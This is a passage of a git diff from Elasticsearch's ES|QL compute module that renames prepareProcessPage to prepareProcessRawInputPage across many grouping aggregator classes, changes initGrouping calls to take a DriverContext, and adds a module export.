b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopBytesRefGroupingAggregatorFunction.java index 4ab5bb9875107..a2161368a78ef 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopBytesRefGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopBytesRefGroupingAggregatorFunction.java @@ -63,7 +63,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopDoubleGroupingAggregatorFunction.java index 8a2f4aef9cf35..9f77b1eef8f17 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopDoubleGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopDoubleGroupingAggregatorFunction.java @@ -62,7 +62,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { DoubleBlock valuesBlock = page.getBlock(channels.get(0)); DoubleVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopFloatGroupingAggregatorFunction.java index d09bf60c82aca..8897d5d29a6ac 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopFloatGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopFloatGroupingAggregatorFunction.java @@ -62,7 +62,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { FloatBlock valuesBlock = page.getBlock(channels.get(0)); FloatVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopIntGroupingAggregatorFunction.java index 786f0660ea06f..61be97ea70260 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopIntGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopIntGroupingAggregatorFunction.java @@ -61,7 +61,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { IntBlock valuesBlock = page.getBlock(channels.get(0)); IntVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopIpGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopIpGroupingAggregatorFunction.java index 3d1137486fb75..9091409ccf160 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopIpGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopIpGroupingAggregatorFunction.java @@ -63,7 +63,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopLongGroupingAggregatorFunction.java index 820aa3c6c63e1..a2ee9a6235deb 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopLongGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/TopLongGroupingAggregatorFunction.java @@ -62,7 +62,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesBooleanGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesBooleanGroupingAggregatorFunction.java index a928d0908eb8e..f112d1ae45635 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesBooleanGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesBooleanGroupingAggregatorFunction.java @@ -55,7 +55,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BooleanBlock valuesBlock = page.getBlock(channels.get(0)); BooleanVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesBytesRefGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesBytesRefGroupingAggregatorFunction.java index 28843942b73cb..c9b689fa1c308 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesBytesRefGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesBytesRefGroupingAggregatorFunction.java @@ -43,7 +43,7 @@ public ValuesBytesRefGroupingAggregatorFunction(List channels, public static ValuesBytesRefGroupingAggregatorFunction create(List channels, DriverContext driverContext) { - return new ValuesBytesRefGroupingAggregatorFunction(channels, ValuesBytesRefAggregator.initGrouping(driverContext.bigArrays()), driverContext); + return new ValuesBytesRefGroupingAggregatorFunction(channels, ValuesBytesRefAggregator.initGrouping(driverContext), driverContext); } public static List intermediateStateDesc() { @@ -56,7 +56,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesDoubleGroupingAggregatorFunction.java index 76c865b33fd09..12fb48567cbfd 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesDoubleGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesDoubleGroupingAggregatorFunction.java @@ -42,7 +42,7 @@ public ValuesDoubleGroupingAggregatorFunction(List channels, public static ValuesDoubleGroupingAggregatorFunction create(List channels, DriverContext driverContext) { - return new ValuesDoubleGroupingAggregatorFunction(channels, ValuesDoubleAggregator.initGrouping(driverContext.bigArrays()), driverContext); + return new ValuesDoubleGroupingAggregatorFunction(channels, ValuesDoubleAggregator.initGrouping(driverContext), driverContext); } public static List intermediateStateDesc() { @@ -55,7 +55,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { DoubleBlock valuesBlock = page.getBlock(channels.get(0)); DoubleVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesFloatGroupingAggregatorFunction.java index bed9a884ccd10..865299d3d6689 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesFloatGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesFloatGroupingAggregatorFunction.java @@ -42,7 +42,7 @@ public ValuesFloatGroupingAggregatorFunction(List channels, public static ValuesFloatGroupingAggregatorFunction create(List channels, DriverContext driverContext) { - return new ValuesFloatGroupingAggregatorFunction(channels, ValuesFloatAggregator.initGrouping(driverContext.bigArrays()), driverContext); + return new ValuesFloatGroupingAggregatorFunction(channels, ValuesFloatAggregator.initGrouping(driverContext), driverContext); } public static List intermediateStateDesc() { @@ -55,7 +55,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { FloatBlock valuesBlock = page.getBlock(channels.get(0)); FloatVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesIntGroupingAggregatorFunction.java index fb801eadcf5cd..def1b78bf2de5 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesIntGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesIntGroupingAggregatorFunction.java @@ -41,7 +41,7 @@ public ValuesIntGroupingAggregatorFunction(List channels, public static ValuesIntGroupingAggregatorFunction create(List channels, DriverContext driverContext) { - return new ValuesIntGroupingAggregatorFunction(channels, ValuesIntAggregator.initGrouping(driverContext.bigArrays()), driverContext); + return new ValuesIntGroupingAggregatorFunction(channels, ValuesIntAggregator.initGrouping(driverContext), driverContext); } public static List intermediateStateDesc() { @@ -54,7 +54,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { IntBlock valuesBlock = page.getBlock(channels.get(0)); IntVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesLongGroupingAggregatorFunction.java index 061af9fcc9213..e46d2ca276f9a 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesLongGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/ValuesLongGroupingAggregatorFunction.java @@ -42,7 +42,7 @@ public ValuesLongGroupingAggregatorFunction(List channels, public static ValuesLongGroupingAggregatorFunction create(List channels, DriverContext driverContext) { - return new ValuesLongGroupingAggregatorFunction(channels, ValuesLongAggregator.initGrouping(driverContext.bigArrays()), driverContext); + return new ValuesLongGroupingAggregatorFunction(channels, ValuesLongAggregator.initGrouping(driverContext), driverContext); } public static List intermediateStateDesc() { @@ -55,7 +55,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidCartesianPointDocValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidCartesianPointDocValuesGroupingAggregatorFunction.java index a959f808e438b..6d08c50e4d1b7 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidCartesianPointDocValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidCartesianPointDocValuesGroupingAggregatorFunction.java @@ -65,7 +65,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidCartesianPointSourceValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidCartesianPointSourceValuesGroupingAggregatorFunction.java index a3593b8152dd7..c5bf41c7b7dd5 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidCartesianPointSourceValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidCartesianPointSourceValuesGroupingAggregatorFunction.java @@ -68,7 +68,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidGeoPointDocValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidGeoPointDocValuesGroupingAggregatorFunction.java index 77a959e654862..2d8377c7fa787 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidGeoPointDocValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidGeoPointDocValuesGroupingAggregatorFunction.java @@ -65,7 +65,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidGeoPointSourceValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidGeoPointSourceValuesGroupingAggregatorFunction.java index fc05c0932f50c..a785997ebb42a 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidGeoPointSourceValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialCentroidGeoPointSourceValuesGroupingAggregatorFunction.java @@ -68,7 +68,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianPointDocValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianPointDocValuesGroupingAggregatorFunction.java index 76f66cf41d569..6b048e222d1e5 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianPointDocValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianPointDocValuesGroupingAggregatorFunction.java @@ -63,7 +63,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianPointSourceValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianPointSourceValuesGroupingAggregatorFunction.java index 3c1159eb0de11..25c06172d7a6b 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianPointSourceValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianPointSourceValuesGroupingAggregatorFunction.java @@ -64,7 +64,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianShapeDocValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianShapeDocValuesGroupingAggregatorFunction.java index 7057281c2ec6f..da45a93c21895 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianShapeDocValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianShapeDocValuesGroupingAggregatorFunction.java @@ -61,7 +61,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { IntBlock valuesBlock = page.getBlock(channels.get(0)); IntVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianShapeSourceValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianShapeSourceValuesGroupingAggregatorFunction.java index 21241efbf3198..624e1579de135 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianShapeSourceValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentCartesianShapeSourceValuesGroupingAggregatorFunction.java @@ -64,7 +64,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoPointDocValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoPointDocValuesGroupingAggregatorFunction.java index 387ed0abc34bb..d93a69eddae77 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoPointDocValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoPointDocValuesGroupingAggregatorFunction.java @@ -65,7 +65,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { LongBlock valuesBlock = page.getBlock(channels.get(0)); LongVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoPointSourceValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoPointSourceValuesGroupingAggregatorFunction.java index 9d9c10902ada6..0aeac922a5f52 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoPointSourceValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoPointSourceValuesGroupingAggregatorFunction.java @@ -66,7 +66,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoShapeDocValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoShapeDocValuesGroupingAggregatorFunction.java index 82553910e1587..4e15b9d3f83ce 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoShapeDocValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoShapeDocValuesGroupingAggregatorFunction.java @@ -63,7 +63,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { IntBlock valuesBlock = page.getBlock(channels.get(0)); IntVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoShapeSourceValuesGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoShapeSourceValuesGroupingAggregatorFunction.java index ccab0870e206d..af6d211657696 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoShapeSourceValuesGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/spatial/SpatialExtentGeoShapeSourceValuesGroupingAggregatorFunction.java @@ -66,7 +66,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BytesRefBlock valuesBlock = page.getBlock(channels.get(0)); BytesRefVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/java/module-info.java b/x-pack/plugin/esql/compute/src/main/java/module-info.java index c4a042d692ea1..f21ed72d7eb21 100644 --- a/x-pack/plugin/esql/compute/src/main/java/module-info.java +++ b/x-pack/plugin/esql/compute/src/main/java/module-info.java @@ -36,4 +36,5 @@ exports org.elasticsearch.compute.aggregation.table; exports org.elasticsearch.compute.data.sort; exports org.elasticsearch.compute.querydsl.query; + exports org.elasticsearch.compute.lucene.read; } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/CountGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/CountGroupingAggregatorFunction.java index 611118d03872b..49562f379fd1e 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/CountGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/CountGroupingAggregatorFunction.java @@ -59,7 +59,7 @@ public int intermediateBlockCount() { } @Override - public AddInput prepareProcessPage(SeenGroupIds seenGroupIds, Page page) { + public AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { Block valuesBlock = page.getBlock(blockIndex()); if (countAll == false) { Vector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/FilteredGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/FilteredGroupingAggregatorFunction.java index 8b7734fe33ab7..e502638011a69 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/FilteredGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/FilteredGroupingAggregatorFunction.java @@ -39,13 +39,13 @@ record FilteredGroupingAggregatorFunction(GroupingAggregatorFunction next, EvalO } @Override - public AddInput prepareProcessPage(SeenGroupIds seenGroupIds, Page page) { + public AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { try (BooleanBlock filterResult = ((BooleanBlock) filter.eval(page))) { ToMask mask = filterResult.toMask(); // TODO warn on mv fields AddInput nextAdd = null; try { - nextAdd = next.prepareProcessPage(seenGroupIds, page); + nextAdd = next.prepareProcessRawInputPage(seenGroupIds, page); AddInput result = new FilteredAddInput(mask.mask(), nextAdd, page.getPositionCount()); mask = null; nextAdd = null; diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/FromPartialGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/FromPartialGroupingAggregatorFunction.java index 19012cabce5a1..8f6c0a8df63eb 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/FromPartialGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/FromPartialGroupingAggregatorFunction.java @@ -40,7 +40,7 @@ public FromPartialGroupingAggregatorFunction(GroupingAggregatorFunction delegate } @Override - public AddInput prepareProcessPage(SeenGroupIds seenGroupIds, Page page) { + public AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { return new AddInput() { @Override public void add(int positionOffset, IntBlock groupIds) { diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/GroupingAggregator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/GroupingAggregator.java index e0d82b1f145b8..931ebcb7afe49 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/GroupingAggregator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/GroupingAggregator.java @@ -66,7 +66,7 @@ public void add(int positionOffset, IntVector groupIds) { public void close() {} }; } else { - return aggregatorFunction.prepareProcessPage(seenGroupIds, page); + return aggregatorFunction.prepareProcessRawInputPage(seenGroupIds, page); } } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/GroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/aggregation/GroupingAggregatorFunction.java index 556902174f213..0de8bb9896d64 100644 --- 